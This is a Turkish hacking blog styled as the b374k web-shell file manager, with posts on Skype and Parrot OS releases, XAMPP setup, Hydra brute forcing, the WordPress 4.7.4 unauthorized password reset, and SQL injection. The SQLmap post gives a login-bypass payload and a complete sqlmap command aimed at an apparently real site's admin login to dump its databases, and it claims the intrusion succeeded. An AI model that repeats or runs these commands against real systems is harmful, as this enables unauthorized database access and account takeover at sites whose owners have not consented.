b374k
v2.8
today : | at : | safemode : ON
/ var / www / public_html
name author perms com modified label

Skype (Preview) Insider'i Tanıttı (Linux) b374k rwxr-xr-x 0 Ekim 06, 2017

Filename Skype (Preview) Insider'i Tanıttı (Linux)
Permission rw-r--r--
Author b374k
Date and Time Ekim 06, 2017
Label
Action
Skype Insider'i tanıttı. Linux için de gelen bu yeni skype eskisinden daha iyi özelliklere ve görünüme sahip.

İndirme linki için ;
https://www.skype.com/tr/insider/

Görünüm;

Hydra Brute Force Attack b374k rwxr-xr-x 0 Eylül 13, 2017

Filename Hydra Brute Force Attack
Permission rw-r--r--
Author b374k
Date and Time Eylül 13, 2017
Label
Action


İnstall (Yükleme)
sudo apt-get install hydra
1 million word list;

Kali Linux Xampp Kurulumu b374k rwxr-xr-x 0 Eylül 13, 2017

Filename Kali Linux Xampp Kurulumu
Permission rw-r--r--
Author b374k
Date and Time Eylül 13, 2017
Label
Action

XAMPP İNDİR

chmod 755 xampp-linux-x64-7.1.4-0-installer.run
./xampp-linux-x64-7.1.4-0-installer.run
Çalıştırmak için "/opt/lampp/lampp start"

WordPress 4.7.4 Unauthorized Password Reset b374k rwxr-xr-x 0 Eylül 13, 2017

Filename WordPress 4.7.4 Unauthorized Password Reset
Permission rw-r--r--
Author b374k
Date and Time Eylül 13, 2017
Label
Action
Someone requested that the password be reset for the following account:
http://localhost/wordpress/
Username: admin
If this was a mistake, just ignore this email and nothing will happen.
To reset your password, visit the following address:
http://localhost/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin


As we can see, fields Return-Path, From, and Message-ID, all have the attacker's domain set.
The verification of the headers can be performed by replacing /usr/sbin/sendmail with a bash script of:
#!/bin/bash
cat > /tmp/outgoing-email

https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html

Parrot Security OS 3.8 Çıktı b374k rwxr-xr-x 0 Eylül 13, 2017

Filename Parrot Security OS 3.8 Çıktı
Permission rw-r--r--
Author b374k
Date and Time Eylül 13, 2017
Label
Action
Hack ile uğraşanların yeni gözde sistemi olan ParrotSec bu gece itibari ile 3.8 sürümünü çıkardığını duyurdu.

https://blog.parrotsec.org/parrot-3-8-release-notes/

Resmi siteden yayınlanan blog yazısına linkten ulaşabilirsiniz.
Parrot Security OS bu değişiklik ile yeni geçtiği sürümleri ise şöyle yayınladı;

  • Debian 10 buster
  • Linux 4.12
  • MATE 1.18
  • GCC 6.4 ve 7.2
  • Java 9
İndirme bağlantısına ise buradan ulaşabilirsiniz.



SQLmap Post Attack b374k rwxr-xr-x 1 Mart 16, 2017

Filename SQLmap Post Attack
Permission rw-r--r--
Author b374k
Date and Time Mart 16, 2017
Label
Action
Genel de en bilindik sql injection id=1' olur fakat az bilinen çok uygulanan
bir atak daha vardır login kısımlarına uyguladığımız 1'or'1'='1 login bypass
teknikleri vardır aynı açıktan yola çıkarak veritabanına erişmek mümkündür
şöyle ki ;

Şöyle bir login şifre ve kullanıcı adına ' tırnak koyalım ve test edelim

Testimiz başarılı hata mesajı verdirebildik.


Şimdi Mozilla Firefox tarayıcımıza Live HTTP Headers eklentisini yükleyelim
post edilen datayı daha sağlıklı görüp almak için yükledikten sonra
Araçlar kısmından eklentiyi seçelim


şimdi Capture seçeneği seçili iken rastgele kullanıcı adı şifre girelim
seçili kısımdaki gibi data çıkacak;

"L=spanish&Link=&LIMIT=&pmc_username=k4y4&pmc_password=k4y4&login_form=Ingresar"
şimdi SQLmap uygulamasını çalıştıralım ve komutumuzu girelim siz komutu girin ben o sırada parametreleri anlatayım; 

sqlmap -u "http://www.sistemleg.com/phpmychat/admin.php" --data="L=spanish&Link=&LIMIT=&pmc_username=k4y4&pmc_password=k4y4&login_form=Ingresar" -p "pmc_username" --batch --random-agent --dbs

-u (açığın bulunduğu adres)
--data (açığın post ettiği data live http headers ile aldık)
-p (data için de açığın bulunduğu input name i)
--batch (hızlı bi sonuç için programın seçeneklerini seçer)
--random-agent (güvenlik duvarı aşmak için user agent kullanımı)
--dbs (database's veritabanlarının adını yazdırmak)
Veritabanına sızma işlemi başarı ile gerçekleşti

 

b374k © 2015 b374k | Cyber Security
b374k Template design by b374k